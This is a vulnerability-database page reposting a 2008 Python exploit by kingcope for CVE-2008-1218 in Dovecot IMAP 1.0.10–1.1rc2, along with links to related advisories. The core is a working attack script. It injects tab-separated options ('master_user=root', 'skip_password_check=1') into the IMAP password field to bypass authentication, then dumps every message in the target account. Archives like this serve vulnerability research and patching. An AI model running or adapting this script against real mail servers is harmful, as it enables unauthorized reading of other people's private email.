Lucene search

K

Dovecot IMAP 1.0.10 1.1rc2 - Remote Email Disclosure

🗓️ 14 Mar 2008 00:00:00Reported by kingcopeType 
exploitpack
 exploitpack
👁 34 Views

Dovecot IMAP 1.0.10 - 1.1rc2 Remote Email Disclosure. Exploit for recent TAB vulnerability in Dovecot

Show more
Related
Code
ReporterTitlePublishedViews
Family
Packet Storm
dovecot-disclose.txt
15 Mar 200800:00
packetstorm
seebug.org
Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
1 Jul 201400:00
seebug
seebug.org
Dovecot IMAP 1.0.10 &lt;= 1.1rc2 Remote Email Disclosure Exploit
15 Mar 200800:00
seebug
Exploit DB
Dovecot IMAP 1.0.10 &lt; 1.1rc2 - Remote Email Disclosure
14 Mar 200800:00
exploitdb
Prion
Design/Logic Flaw
10 Mar 200823:44
prion
Prion
Design/Logic Flaw
10 Mar 200821:44
prion
UbuntuCve
CVE-2008-1218
10 Mar 200800:00
ubuntucve
OpenVAS
FreeBSD Ports: dovecot
4 Sep 200800:00
openvas
OpenVAS
FreeBSD Ports: dovecot
4 Sep 200800:00
openvas
OpenVAS
Fedora Update for dovecot FEDORA-2008-2475
16 Feb 200900:00
openvas
Rows per page
#lame Dovecot IMAP [1.0.10 -> 1.1rc3] Exploit
#Here's an exploit for the recent TAB vulnerability in Dovecot.
#It's nothing special since in the wild there are few to none
#targets because of the special option which has to be set.
#see CVE Entry CVE-2008-1218
#Exploit written by Kingcope
import sys
import imaplib

print "Dovecot IMAP [1.0.10 -> 1.1rc2] Exploit"
print "Prints out all E-Mails for any account if special configuration option is set"
print "Exploit written by kingcope\n"

if len(sys.argv)<3:
     print "usage: %s <hostname/ip address> <account> [-nossl]" % sys.argv[0]
     exit(0);

if len(sys.argv)>3 and sys.argv[3] == "-nossl":
	M = imaplib.IMAP4(sys.argv[1])
else:
	M = imaplib.IMAP4_SSL(sys.argv[1])
M.login(sys.argv[2], "\"\tmaster_user=root\tskip_password_check=1\"");
M.select()
print "login succeeded."
typ, data = M.search(None, 'ALL')
k=0
for num in data[0].split():
    typ, data = M.fetch(num, '(RFC822)')
    print 'Message %s\n%s\n' % (num, data[0][1])
    k=k+1
M.close()
M.logout()
print "Messages read: %s" % k

# milw0rm.com [2008-03-14]

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
14 Mar 2008 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.034
34
.json
Report